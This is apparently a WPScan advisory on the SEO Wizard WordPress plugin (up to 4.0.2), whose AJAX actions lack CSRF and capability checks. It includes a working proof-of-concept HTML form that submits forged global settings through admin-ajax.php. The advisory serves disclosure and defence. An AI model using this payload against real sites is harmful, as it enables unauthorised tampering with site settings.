WordPress Plugin Vulnerabilities
SEO Wizard <= 4.0.2 - Unauthorised AJAX Calls
Description
The plugin does not properly check for CSRF in its ajax_save_global_settings and ajax_save_post_settings AJAX actions, as well as other AJAX actions. Furthermore, capability checks were also missing, resulting in any authenticated users (as low as subscriber) being able to call those actions and modify the plugin's settings for instance.
Proof of Concept
When being logged as any user (such as subscriber) <html> <body> <form action="https://example.com/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="wsw_save_global_settings" /> <input type="hidden" name="chk_keyword_to_titles" value="1" /> <input type="hidden" name="chk_nofollow_in_external" value="0" /> <input type="hidden" name="chk_nofollow_in_image" value="0" /> <input type="hidden" name="chk_use_facebook" value="0" /> <input type="hidden" name="chk_use_twitter" value="0" /> <input type="hidden" name="chk_use_richsnippets" value="1" /> <input type="hidden" name="chk_author_linking" value="0" /> <input type="hidden" name="chk_keyword_decorate_bold" value="0" /> <input type="hidden" name="chk_keyword_decorate_italic" value="0" /> <input type="hidden" name="chk_keyword_decorate_underline" value="0" /> <input type="hidden" name="opt_keyword_decorate_bold_type" value="0" /> <input type="hidden" name="opt_keyword_decorate_italic_type" value="0" /> <input type="hidden" name="txt_image_alternate" value="" /> <input type="hidden" name="txt_image_title" value="" /> <input type="hidden" name="opt_image_alternate_type" value="empty" /> <input type="hidden" name="opt_image_title_type" value="empty" /> <input type="hidden" name="chk_tagging_using_google" value="0" /> <input type="hidden" name="txt_generic_tags" value="" /> <input type="hidden" name="chk_block_login_page" value="0" /> <input type="hidden" name="chk_block_admin_page" value="0" /> <input type="hidden" name="lsi_bing_api_key" value="" /> <input type="hidden" name="chk_tweak_permalink" value="0" /> <input type="hidden" name="chk_use_meta_robot" value="1" /> <input type="hidden" name="chk_make_sitemap" value="0" /> <input type="hidden" name="chk_homepage_static" value="1" /> <input type="hidden" name="wsw_homepage_title" value="" /> <input type="hidden" name="wsw_homepage_desc" value="" /> <input type="hidden" name="wsw_homepage_keywords" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Affects Plugins
Classification
Type
ACCESS CONTROLS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
WPScanTeam
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-06-30 (about 2 years ago)
Added
2021-06-30 (about 2 years ago)
Last Updated
2021-06-30 (about 2 years ago)